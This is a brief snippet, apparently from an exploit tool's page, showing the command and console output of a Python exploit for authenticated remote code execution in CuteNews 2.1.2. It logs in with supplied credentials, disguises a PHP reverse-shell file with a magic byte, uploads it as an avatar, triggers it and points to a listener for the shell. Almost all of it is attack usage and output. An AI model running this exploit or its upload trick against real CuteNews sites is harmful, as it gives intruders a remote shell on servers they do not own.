CuteNews
Authenticated RCE
$ python3 exploit.py -l http://cn-instance -u test123 -p test123 -e test@mail.com
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://cn-instance/uploads/avatar_test123_test123.php
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shellLast updated